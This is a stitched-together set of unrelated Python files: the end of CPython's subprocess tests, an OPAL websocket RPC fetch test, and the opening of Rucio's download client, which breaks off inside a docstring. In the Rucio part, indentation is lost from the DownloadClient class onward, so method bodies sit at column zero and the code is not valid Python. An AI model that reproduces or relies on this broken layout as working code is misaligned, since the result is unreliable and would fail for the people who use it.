        # ignored
        subprocess.call(ZERO_RETURN_CMD,
                        startupinfo=startupinfo)

    def test_startupinfo_copy(self):
        # bpo-34044: Popen must not modify input STARTUPINFO structure
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
        startupinfo.wShowWindow = subprocess.SW_HIDE

        # Call Popen() twice with the same startupinfo object to make sure
        # that it's not modified
        for _ in range(2):
            cmd = ZERO_RETURN_CMD
            with open(os.devnull, 'w') as null:
                proc = subprocess.Popen(cmd,
                                        stdout=null,
                                        stderr=subprocess.STDOUT,
                                        startupinfo=startupinfo)
                with proc:
                    proc.communicate()
                self.assertEqual(proc.returncode, 0)

            # Each field of the caller's STARTUPINFO must be untouched.
            self.assertEqual(startupinfo.dwFlags,
                             subprocess.STARTF_USESHOWWINDOW)
            self.assertIsNone(startupinfo.hStdInput)
            self.assertIsNone(startupinfo.hStdOutput)
            self.assertIsNone(startupinfo.hStdError)
            self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
            self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})

    def test_creationflags(self):
        # creationflags argument
        CREATE_NEW_CONSOLE = 16
        sys.stderr.write("    a DOS box should flash briefly ...\n")
        subprocess.call(sys.executable +
                        ' -c "import time; time.sleep(0.25)"',
                        creationflags=CREATE_NEW_CONSOLE)

    def test_invalid_args(self):
        # invalid arguments should raise ValueError
        # (preexec_fn is POSIX-only and must be rejected on Windows)
        self.assertRaises(ValueError, subprocess.call,
                          [sys.executable, "-c",
                           "import sys; sys.exit(47)"],
                          preexec_fn=lambda: 1)

    @support.cpython_only
    def test_issue31471(self):
        # There shouldn't be an assertion failure in Popen() in case the env
        # argument has a bad keys() method.
        class BadEnv(dict):
            keys = None
        with self.assertRaises(TypeError):
            subprocess.Popen(ZERO_RETURN_CMD, env=BadEnv())

    def test_close_fds(self):
        # close file descriptors
        rc = subprocess.call([sys.executable, "-c",
                              "import sys; sys.exit(47)"],
                             close_fds=True)
        self.assertEqual(rc, 47)

    def test_close_fds_with_stdio(self):
        """Handle inheritance interaction of close_fds and lpAttributeList."""
        import msvcrt

        fds = os.pipe()
        self.addCleanup(os.close, fds[0])
        self.addCleanup(os.close, fds[1])

        handles = []
        for fd in fds:
            os.set_inheritable(fd, True)
            handles.append(msvcrt.get_osfhandle(fd))

        # close_fds=False: the child can open the inherited handle.
        p = subprocess.Popen([sys.executable, "-c",
                              "import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
                             stdout=subprocess.PIPE, close_fds=False)
        stdout, stderr = p.communicate()
        self.assertEqual(p.returncode, 0)
        int(stdout.strip())  # Check that stdout is an integer

        # close_fds=True: the handle must not be inherited -> OSError.
        p = subprocess.Popen([sys.executable, "-c",
                              "import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
        stdout, stderr = p.communicate()
        self.assertEqual(p.returncode, 1)
        self.assertIn(b"OSError", stderr)

        # The same as the previous call, but with an empty handle_list
        handle_list = []
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.lpAttributeList = {"handle_list": handle_list}
        p = subprocess.Popen([sys.executable, "-c",
                              "import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                             startupinfo=startupinfo, close_fds=True)
        stdout, stderr = p.communicate()
        self.assertEqual(p.returncode, 1)
        self.assertIn(b"OSError", stderr)

        # Check for a warning due to using handle_list and close_fds=False
        with warnings_helper.check_warnings((".*overriding close_fds",
                                             RuntimeWarning)):
            startupinfo = subprocess.STARTUPINFO()
            startupinfo.lpAttributeList = {"handle_list": handles[:]}
            p = subprocess.Popen([sys.executable, "-c",
                                  "import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
                                 stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                 startupinfo=startupinfo, close_fds=False)
            stdout, stderr = p.communicate()
            self.assertEqual(p.returncode, 0)

    def test_empty_attribute_list(self):
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.lpAttributeList = {}
        subprocess.call(ZERO_RETURN_CMD,
                        startupinfo=startupinfo)

    def test_empty_handle_list(self):
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.lpAttributeList = {"handle_list": []}
        subprocess.call(ZERO_RETURN_CMD,
                        startupinfo=startupinfo)

    def test_shell_sequence(self):
        # Run command through the shell (sequence)
        newenv = os.environ.copy()
        newenv["FRUIT"] = "physalis"
        p = subprocess.Popen(["set"], shell=1,
                             stdout=subprocess.PIPE,
                             env=newenv)
        with p:
            self.assertIn(b"physalis", p.stdout.read())

    def test_shell_string(self):
        # Run command through the shell (string)
        newenv = os.environ.copy()
        newenv["FRUIT"] = "physalis"
        p = subprocess.Popen("set", shell=1,
                             stdout=subprocess.PIPE,
                             env=newenv)
        with p:
            self.assertIn(b"physalis", p.stdout.read())

    def test_shell_encodings(self):
        # Run command through the shell (string) in both Windows codepages
        for enc in ['ansi', 'oem']:
            newenv = os.environ.copy()
            newenv["FRUIT"] = "physalis"
            p = subprocess.Popen("set", shell=1,
                                 stdout=subprocess.PIPE,
                                 env=newenv,
                                 encoding=enc)
            with p:
                self.assertIn("physalis", p.stdout.read(), enc)

    def test_call_string(self):
        # call() function with string argument on Windows
        rc = subprocess.call(sys.executable +
                             ' -c "import sys; sys.exit(47)"')
        self.assertEqual(rc, 47)

    def _kill_process(self, method, *args):
        """Start a long-running child, apply ``method`` to it, and check the
        child was terminated with a non-zero return code."""
        # Some win32 buildbot raises EOFError if stdin is inherited
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                             import sys, time
                             sys.stdout.write('x\\n')
                             sys.stdout.flush()
                             time.sleep(30)
                             """],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        with p:
            # Wait for the interpreter to be completely initialized before
            # sending any signal.
            p.stdout.read(1)
            getattr(p, method)(*args)
            _, stderr = p.communicate()
            self.assertEqual(stderr, b'')
            returncode = p.wait()
        self.assertNotEqual(returncode, 0)

    def _kill_dead_process(self, method, *args):
        """Apply ``method`` to a child that has already exited; it must not
        raise, and the original exit code (42) must be preserved."""
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                             import sys, time
                             sys.stdout.write('x\\n')
                             sys.stdout.flush()
                             sys.exit(42)
                             """],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        with p:
            # Wait for the interpreter to be completely initialized before
            # sending any signal.
            p.stdout.read(1)
            # The process should end after this
            time.sleep(1)
            # This shouldn't raise even though the child is now dead
            getattr(p, method)(*args)
            _, stderr = p.communicate()
            self.assertEqual(stderr, b'')
            rc = p.wait()
        self.assertEqual(rc, 42)

    def test_send_signal(self):
        self._kill_process('send_signal', signal.SIGTERM)

    def test_kill(self):
        self._kill_process('kill')

    def test_terminate(self):
        self._kill_process('terminate')

    def test_send_signal_dead(self):
        self._kill_dead_process('send_signal', signal.SIGTERM)

    def test_kill_dead(self):
        self._kill_dead_process('kill')

    def test_terminate_dead(self):
        self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
    """Tests not tied to a particular platform or Popen code path."""

    class RecordingPopen(subprocess.Popen):
        """A Popen that saves a reference to each instance for testing."""
        # Shared across all instances on purpose: the test harness drains it.
        instances_created = []

        def __init__(self, *args, **kwargs):
            super().__init__(*args, **kwargs)
            self.instances_created.append(self)

    @mock.patch.object(subprocess.Popen, "_communicate")
    def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
                                        **kwargs):
        """Fake a SIGINT happening during Popen._communicate() and ._wait().

        This avoids the need to actually try and get test environments to send
        and receive signals reliably across platforms.  The net effect of a ^C
        happening during a blocking subprocess execution which we want to clean
        up from is a KeyboardInterrupt coming out of communicate() or wait().
        """
        mock__communicate.side_effect = KeyboardInterrupt
        try:
            with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
                # We patch out _wait() as no signal was involved so the
                # child process isn't actually going to exit rapidly.
                mock__wait.side_effect = KeyboardInterrupt
                with mock.patch.object(subprocess, "Popen",
                                       self.RecordingPopen):
                    with self.assertRaises(KeyboardInterrupt):
                        popener([sys.executable, "-c",
                                 "import time\ntime.sleep(9)\nimport sys\n"
                                 "sys.stderr.write('\\n!runaway child!\\n')"],
                                stdout=subprocess.DEVNULL, **kwargs)
                # After the first wait(), only bounded waits are allowed —
                # an open-ended wait would block the ^C cleanup forever.
                for call in mock__wait.call_args_list[1:]:
                    self.assertNotEqual(
                        call, mock.call(timeout=None),
                        "no open-ended wait() after the first allowed: "
                        f"{mock__wait.call_args_list}")
                sigint_calls = []
                for call in mock__wait.call_args_list:
                    if call == mock.call(timeout=0.25):  # from Popen.__init__
                        sigint_calls.append(call)
                self.assertLessEqual(mock__wait.call_count, 2,
                                     msg=mock__wait.call_args_list)
                self.assertEqual(len(sigint_calls), 1,
                                 msg=mock__wait.call_args_list)
        finally:
            # cleanup the forgotten (due to our mocks) child process
            process = self.RecordingPopen.instances_created.pop()
            process.kill()
            process.wait()
            self.assertEqual([], self.RecordingPopen.instances_created)

    def test_call_keyboardinterrupt_no_kill(self):
        self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)

    def test_run_keyboardinterrupt_no_kill(self):
        self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)

    def test_context_manager_keyboardinterrupt_no_kill(self):
        def popen_via_context_manager(*args, **kwargs):
            with subprocess.Popen(*args, **kwargs) as unused_process:
                raise KeyboardInterrupt  # Test how __exit__ handles ^C.
        self._test_keyboardinterrupt_no_kill(popen_via_context_manager)

    def test_getoutput(self):
        self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
        self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
                         (0, 'xyzzy'))

        # we use mkdtemp in the next line to create an empty directory
        # under our exclusive control; from that, we can invent a pathname
        # that we _know_ won't exist.  This is guaranteed to fail.
        dir = None
        try:
            dir = tempfile.mkdtemp()
            name = os.path.join(dir, "foo")
            status, output = subprocess.getstatusoutput(
                ("type " if mswindows else "cat ") + name)
            self.assertNotEqual(status, 0)
        finally:
            if dir is not None:
                os.rmdir(dir)

    def test__all__(self):
        """Ensure that __all__ is populated properly."""
        intentionally_excluded = {"list2cmdline", "Handle", "pwd", "grp", "fcntl"}
        exported = set(subprocess.__all__)
        possible_exports = set()
        import types
        for name, value in subprocess.__dict__.items():
            if name.startswith('_'):
                continue
            if isinstance(value, (types.ModuleType,)):
                continue
            possible_exports.add(name)
        self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
                     "Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
    """Re-run the whole ProcessTestCase suite with select()-based selector
    forced, to cover the non-poll() code path in subprocess."""

    def setUp(self):
        # Swap in SelectSelector for the duration of each test.
        self.orig_selector = subprocess._PopenSelector
        subprocess._PopenSelector = selectors.SelectSelector
        ProcessTestCase.setUp(self)

    def tearDown(self):
        subprocess._PopenSelector = self.orig_selector
        ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
    """Windows quoting: commands and script paths containing spaces."""

    def setUp(self):
        super().setUp()
        # Create a throwaway script whose filename contains a space; it
        # echoes back argc and lowercased argv for verification.
        f, fname = tempfile.mkstemp(".py", "te st")
        self.fname = fname.lower ()
        os.write(f, b"import sys;"
                    b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
                 )
        os.close(f)

    def tearDown(self):
        os.remove(self.fname)
        super().tearDown()

    def with_spaces(self, *args, **kwargs):
        # Run the helper script and check argv arrived intact (argc == 2,
        # script path and the space-containing argument preserved).
        kwargs['stdout'] = subprocess.PIPE
        p = subprocess.Popen(*args, **kwargs)
        with p:
            self.assertEqual(
                p.stdout.read ().decode("mbcs"),
                "2 [%r, 'ab cd']" % self.fname
            )

    def test_shell_string_with_spaces(self):
        # call() function with string argument with spaces on Windows
        self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
                                             "ab cd"), shell=1)

    def test_shell_sequence_with_spaces(self):
        # call() function with sequence argument with spaces on Windows
        self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)

    def test_noshell_string_with_spaces(self):
        # call() function with string argument with spaces on Windows
        self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
                                             "ab cd"))

    def test_noshell_sequence_with_spaces(self):
        # call() function with sequence argument with spaces on Windows
        self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
    """Popen used as a context manager: pipes are closed and the child is
    wait()ed on when the block exits."""

    def test_pipe(self):
        with subprocess.Popen([sys.executable, "-c",
                               "import sys;"
                               "sys.stdout.write('stdout');"
                               "sys.stderr.write('stderr');"],
                              stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE) as proc:
            self.assertEqual(proc.stdout.read(), b"stdout")
            self.assertEqual(proc.stderr.read(), b"stderr")

        # __exit__ must have closed both pipe files.
        self.assertTrue(proc.stdout.closed)
        self.assertTrue(proc.stderr.closed)

    def test_returncode(self):
        with subprocess.Popen([sys.executable, "-c",
                               "import sys; sys.exit(100)"]) as proc:
            pass
        # __exit__ calls wait(), so the returncode should be set
        self.assertEqual(proc.returncode, 100)

    def test_communicate_stdin(self):
        with subprocess.Popen([sys.executable, "-c",
                               "import sys;"
                               "sys.exit(sys.stdin.read() == 'context')"],
                              stdin=subprocess.PIPE) as proc:
            proc.communicate(b"context")
            self.assertEqual(proc.returncode, 1)

    def test_invalid_args(self):
        with self.assertRaises(NONEXISTING_ERRORS):
            with subprocess.Popen(NONEXISTING_CMD,
                                  stdout=subprocess.PIPE,
                                  stderr=subprocess.PIPE) as proc:
                pass

    def test_broken_pipe_cleanup(self):
        """Broken pipe error should not prevent wait() (Issue 21619)"""
        proc = subprocess.Popen(ZERO_RETURN_CMD,
                                stdin=subprocess.PIPE,
                                bufsize=support.PIPE_MAX_SIZE*2)
        proc = proc.__enter__()
        # Prepare to send enough data to overflow any OS pipe buffering and
        # guarantee a broken pipe error. Data is held in BufferedWriter
        # buffer until closed.
        proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
        self.assertIsNone(proc.returncode)
        # EPIPE expected under POSIX; EINVAL under Windows
        self.assertRaises(OSError, proc.__exit__, None, None, None)
        self.assertEqual(proc.returncode, 0)
        self.assertTrue(proc.stdin.closed)
# Allow the test module to be run directly as a script.
if __name__ == "__main__":
    unittest.main()
|
rpc_fetch_test.py | import os
import sys
# Add parent path to use local src as package for tests
root_dir = os.path.abspath(
os.path.join(
os.path.dirname(__file__), os.path.pardir, os.path.pardir, os.path.pardir
)
)
sys.path.append(root_dir)
import asyncio
from multiprocessing import Process
import pytest
import uvicorn
from fastapi import FastAPI
from fastapi_websocket_rpc import RpcMethodsBase, WebsocketRPCEndpoint
from opal_common.fetcher import FetchingEngine
from opal_common.fetcher.providers.fastapi_rpc_fetch_provider import (
FastApiRpcFetchConfig,
FastApiRpcFetchEvent,
FastApiRpcFetchProvider,
)
# Configurable
PORT = int(os.environ.get("PORT") or "9110")
uri = f"ws://localhost:{PORT}/rpc"
DATA_PREFIX = "I AM DATA - HEAR ME ROAR"
SUFFIX = " - Magic!"
class RpcData(RpcMethodsBase):
    """RPC method set served by the test websocket endpoint."""

    async def get_data(self, suffix: str) -> str:
        # Echo the well-known prefix followed by the caller-supplied suffix.
        return f"{DATA_PREFIX}{suffix}"
def setup_server():
    """Build a FastAPI app exposing RpcData over websocket RPC at /rpc and
    serve it with uvicorn (blocking; intended to run in a child process)."""
    app = FastAPI()
    endpoint = WebsocketRPCEndpoint(RpcData())
    endpoint.register_route(app, "/rpc")
    uvicorn.run(app, port=PORT)
@pytest.fixture(scope="module")
def server():
    """Module-scoped fixture: run the RPC server in a daemon subprocess and
    kill it when the module's tests are done."""
    # Run the server as a separate process
    proc = Process(target=setup_server, args=(), daemon=True)
    proc.start()
    yield proc
    proc.kill()  # Cleanup after test
@pytest.mark.asyncio
async def test_simple_rpc_fetch(server):
    """Fetch a value over websocket RPC via FastApiRpcFetchProvider and
    verify the callback receives DATA_PREFIX + SUFFIX within 5 seconds."""
    got_data_event = asyncio.Event()
    async with FetchingEngine() as engine:
        engine.register.register_fetcher(
            FastApiRpcFetchProvider.__name__, FastApiRpcFetchProvider
        )
        # Event for RPC fetch
        fetch_event = FastApiRpcFetchEvent(
            url=uri,
            config=FastApiRpcFetchConfig(
                rpc_method_name="get_data", rpc_arguments={"suffix": SUFFIX}
            ),
        )

        # Callback for event
        async def callback(result):
            data = result.result
            assert data == DATA_PREFIX + SUFFIX
            got_data_event.set()

        await engine.queue_fetch_event(fetch_event, callback)
        # Fail the test if the callback never fires.
        await asyncio.wait_for(got_data_event.wait(), 5)
        assert got_data_event.is_set()
|
downloadclient.py | # Copyright 2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Tomas Javurek <tomasjavurek09@gmail.com>, 2018
# - Vincent Garonne <vgaronne@gmail.com>, 2018
# - Joaquin Bogado <jbogado@linti.unlp.edu.ar>, 2018
# - Nicolo Magini <nicolo.magini@cern.ch>, 2018-2019
# - Tobias Wegner <tobias.wegner@cern.ch>, 2018-2019
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
#
# PY3K COMPATIBLE
from __future__ import division
import copy
import logging
import os
import os.path
import random
import shutil
import signal
import time
try:
from Queue import Queue, Empty, deque
except ImportError:
from queue import Queue, Empty, deque
from threading import Thread
from rucio.client.client import Client
from rucio.common.exception import (InputValidationError, NoFilesDownloaded, ServiceUnavailable,
NotAllFilesDownloaded, RSENotFound, RucioException, SourceNotFound)
from rucio.common.utils import adler32, md5, detect_client_location, generate_uuid, parse_replicas_from_string, send_trace, sizefmt, execute, parse_replicas_from_file
from rucio.rse import rsemanager as rsemgr
from rucio import version
class BaseExtractionTool:
    """Wrapper around an external archive extraction program (e.g. unzip, tar).

    Probes once whether the program is installed and caches the result.
    """

    def __init__(self, program_name, useability_check_args, extract_args, logger):
        """
        Initialises a extraction tool object

        :param program_name: the name of the archive extraction program, e.g., unzip
        :param useability_check_args: the arguments of the extraction program to test if its installed, e.g., --version
        :param extract_args: the arguments that will be passed to the program for extraction
        :param logger: logging.Logger object
        """
        self.program_name = program_name
        self.useability_check_args = useability_check_args
        self.extract_args = extract_args
        self.logger = logger
        self.is_useable_result = None  # tri-state cache: None means "not probed yet"

    def is_useable(self):
        """
        Checks if the extraction tool is installed and usable

        :returns: True if it is usable otherwise False
        """
        if self.is_useable_result is not None:
            return self.is_useable_result
        # Bugfix: the result was previously stored under the misspelled
        # attribute 'is_usable_result', so the cache check above never hit
        # and the probe command re-ran on every call.
        self.is_useable_result = False
        cmd = '%s %s' % (self.program_name, self.useability_check_args)
        try:
            exitcode, out, err = execute(cmd)
            exitcode = int(exitcode)
            self.logger.debug('"%s" returned with exitcode %d' % (cmd, exitcode))
            self.is_useable_result = (exitcode == 0)
        except Exception as error:
            # Bugfix: log the command instead of 'exitcode', which is unbound
            # when execute() itself raised (caused a NameError in the handler).
            self.logger.debug('Failed to execute: "%s"' % cmd)
            self.logger.debug(error)
        return self.is_useable_result

    def try_extraction(self, archive_file_path, file_to_extract, dest_dir_path):
        """
        Calls the extraction program to extract a file from an archive

        :param archive_file_path: path to the archive
        :param file_to_extract: file name to extract from the archive
        :param dest_dir_path: destination directory where the extracted file will be stored

        :returns: True on success otherwise False
        """
        if not self.is_useable():
            return False
        args_map = {'archive_file_path': archive_file_path,
                    'file_to_extract': file_to_extract,
                    'dest_dir_path': dest_dir_path}
        extract_args = self.extract_args % args_map
        cmd = '%s %s' % (self.program_name, extract_args)
        try:
            exitcode, out, err = execute(cmd)
            exitcode = int(exitcode)
            self.logger.debug('"%s" returned with exitcode %d' % (cmd, exitcode))
            return (exitcode == 0)
        except Exception as error:
            # Same unbound-variable fix as in is_useable().
            self.logger.debug('Failed to execute: "%s"' % cmd)
            self.logger.debug(error)
        return False
class DownloadClient:
def __init__(self, client=None, logger=None, tracing=True, check_admin=False):
    """
    Initialises the basic settings for an DownloadClient object

    :param client: Optional: rucio.client.client.Client object. If None, a new object will be created.
    :param logger: Optional: logging.Logger object to use for downloads. If None nothing will be logged.
    :param tracing: Optional: if False, no traces are sent to the trace service.
    :param check_admin: Optional: if True, query the account attributes and
                        enable admin mode (tape access) for admin accounts.
    """
    if not logger:
        # No logger given: install a disabled placeholder so callers can
        # always call self.logger.* unconditionally.
        logger = logging.getLogger('%s.null' % __name__)
        logger.disabled = True

    self.logger = logger
    self.tracing = tracing
    if not self.tracing:
        logger.debug('Tracing is turned off.')
    self.is_human_readable = True
    self.client = client if client else Client()
    # Geographic/site info of this client, used for sorting replicas and traces.
    self.client_location = detect_client_location()

    # Tape endpoints are excluded by default; admins may read from tape.
    self.is_tape_excluded = True
    self.is_admin = False
    if check_admin:
        account_attributes = list(self.client.list_account_attributes(self.client.account))
        for attr in account_attributes[0]:
            if attr['key'] == 'admin':
                self.is_admin = attr['value'] is True
                break

    if self.is_admin:
        self.is_tape_excluded = False
        logger.debug('Admin mode enabled')

    # Template for trace records sent to the trace service; per-download
    # fields are added on top of this.
    self.trace_tpl = {}
    self.trace_tpl['hostname'] = self.client_location['fqdn']
    self.trace_tpl['localSite'] = self.client_location['site']
    self.trace_tpl['account'] = self.client.account
    self.trace_tpl['eventType'] = 'download'
    self.trace_tpl['eventVersion'] = 'api_%s' % version.RUCIO_VERSION[0]

    # Above this many files, download whole archives instead of extracting
    # single files client-side ("cea" = client extraction of archives).
    self.use_cea_threshold = 10

    # Supported archive extraction tools, tried in order.
    self.extraction_tools = []

    # unzip <archive_file_path> <did_name> -d <dest_dir_path>
    extract_args = '%(archive_file_path)s %(file_to_extract)s -d %(dest_dir_path)s'
    self.extraction_tools.append(BaseExtractionTool('unzip', '-v', extract_args, logger))

    # tar -C <dest_dir_path> -xf <archive_file_path> <did_name>
    extract_args = '-C %(dest_dir_path)s -xf %(archive_file_path)s %(file_to_extract)s'
    self.extraction_tools.append(BaseExtractionTool('tar', '--version', extract_args, logger))
def download_file_from_archive(self, items, trace_custom_fields={}):
"""
Download items with a given PFN. This function can only download files, no datasets.
:param items: List of dictionaries. Each dictionary describing a file to download. Keys:
did - DID string of the archive file (e.g. 'scope:file.name'). Wildcards are not allowed
archive - DID string of the archive from which the file should be extracted
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK'). RSE Expressions are allowed
base_dir - Optional: Base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
:param trace_custom_fields: Custom key value pairs to send with the traces
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
clientState can be one of the following: ALREADY_DONE, DONE, FILE_NOT_FOUND, FAIL_VALIDATE, FAILED
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises SourceNotFound: if xrdcp was unable to find the PFN
:raises ServiceUnavailable: if xrdcp failed
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
trace = copy.deepcopy(self.trace_tpl)
trace['uuid'] = generate_uuid()
log_prefix = 'Extracting files: '
logger.info('Processing %d item(s) for input' % len(items))
for item in items:
archive = item.get('archive')
file_extract = item.get('did')
rse_name = item.get('rse')
if not archive or not file_extract:
raise InputValidationError('File DID and archive DID are mandatory')
if '*' in archive:
logger.debug(archive)
raise InputValidationError('Cannot use PFN download with wildcard in DID')
file_extract_scope, file_extract_name = self._split_did_str(file_extract)
archive_scope, archive_name = self._split_did_str(archive)
# listing all available replicas of given archhive file
rse_expression = 'istape=False' if not rse_name else '(%s)&istape=False' % rse_name
archive_replicas = self.client.list_replicas([{'scope': archive_scope, 'name': archive_name}],
schemes=['root'],
rse_expression=rse_expression,
unavailable=False,
client_location=self.client_location)
# preparing trace
trace['scope'] = archive_scope
trace['dataset'] = archive_name
trace['filename'] = file_extract
# preparing output directories
dest_dir_path = self._prepare_dest_dir(item.get('base_dir', '.'),
os.path.join(archive_scope, archive_name + '.extracted'), file_extract,
item.get('no_subdir'))
logger.debug('%sPreparing output destination %s' % (log_prefix, dest_dir_path))
# validation and customisation of list of replicas
archive_replicas = list(archive_replicas)
if len(archive_replicas) != 1:
raise RucioException('No replicas for DID found or dataset was given.')
archive_pfns = archive_replicas[0]['pfns'].keys()
if len(archive_pfns) == 0:
raise InputValidationError('No PFNs for replicas of archive %s' % archive)
# checking whether file already exists
success = False
dest_file_path = os.path.join(dest_dir_path, file_extract)
if os.path.isfile(dest_file_path):
logger.info('%s%s File exists already locally: %s' % (log_prefix, file_extract_name, dest_dir_path))
trace['clientState'] = 'ALREADY_DONE'
trace['transferStart'] = time.time()
trace['transferEnd'] = time.time()
self._send_trace(trace)
success = True
# DOWNLOAD, iteration over different rses unitl success
retry_counter = 0
while not success and len(archive_pfns):
retry_counter += 1
pfn = archive_pfns.pop()
trace['rse'] = archive_replicas[0]['pfns'][pfn]['rse']
try:
start_time = time.time()
cmd = 'xrdcp -vf %s -z %s %s' % (pfn, file_extract_name, dest_dir_path)
logger.debug('%sExecuting: %s' % (log_prefix, cmd))
status, out, err = execute(cmd)
end_time = time.time()
trace['transferStart'] = start_time
trace['transferEnd'] = end_time
if status == 54:
trace['clientState'] = 'FAILED'
raise SourceNotFound(err)
elif status != 0:
trace['clientState'] = 'FAILED'
raise RucioException(err)
else:
success = True
item['clientState'] = 'DONE'
trace['clientState'] = 'DONE'
except Exception as e:
trace['clientState'] = 'FAILED'
trace['stateReason'] = str(ServiceUnavailable(e))
raise ServiceUnavailable(e)
self._send_trace(trace)
if not success:
raise RucioException('Failed to download file %s after %d retries' % (file_extract_name, retry_counter))
return self._check_output(items)
def download_pfns(self, items, num_threads=2, trace_custom_fields={}):
"""
Download items with a given PFN. This function can only download files, no datasets.
:param items: List of dictionaries. Each dictionary describing a file to download. Keys:
pfn - PFN string of this file
did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed
rse - rse name (e.g. 'CERN-PROD_DATADISK'). RSE Expressions are not allowed
base_dir - Optional: Base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
ignore_checksum - Optional: If true, the checksum validation is skipped (for pfn downloads the checksum must be given explicitly). (Default: True)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
clientState can be one of the following: ALREADY_DONE, DONE, FILE_NOT_FOUND, FAIL_VALIDATE, FAILED
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
logger.info('Processing %d item(s) for input' % len(items))
input_items = []
for item in items:
did_str = item.get('did')
pfn = item.get('pfn')
rse = item.get('rse')
if not did_str or not pfn or not rse:
logger.debug(item)
raise InputValidationError('The keys did, pfn, and rse are mandatory')
logger.debug('Preparing PFN download of %s (%s) from %s' % (did_str, pfn, rse))
if '*' in did_str:
logger.debug(did_str)
raise InputValidationError('Cannot use PFN download with wildcard in DID')
did_scope, did_name = self._split_did_str(did_str)
dest_dir_path = self._prepare_dest_dir(item.get('base_dir', '.'),
did_scope, did_name,
item.get('no_subdir'))
item['scope'] = did_scope
item['name'] = did_name
item['sources'] = [{'pfn': pfn, 'rse': rse}]
dest_file_path = os.path.join(dest_dir_path, did_name)
item['dest_file_paths'] = [dest_file_path]
item['temp_file_path'] = '%s.part' % dest_file_path
options = item.setdefault('merged_options', {})
options.setdefault('ignore_checksum', item.pop('ignore_checksum', True))
options.setdefault('transfer_timeout', item.pop('transfer_timeout', None))
input_items.append(item)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields)
num_files_out = len(output_items)
if num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items)
def download_dids(self, items, num_threads=2, trace_custom_fields={}):
"""
Download items with given DIDs. This function can also download datasets and wildcarded DIDs.
:param items: List of dictionaries. Each dictionary describing an item to download. Keys:
did - DID string of this file (e.g. 'scope:file.name')
filters - Filter to select DIDs for download. Optional if DID is given
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download
no_resolve_archives - Optional: bool indicating whether archives should not be considered for download (Default: False)
resolve_archives - Deprecated: Use no_resolve_archives instead
force_scheme - Optional: force a specific scheme to download this item. (Default: None)
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly choosen for download from the dataset
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False)
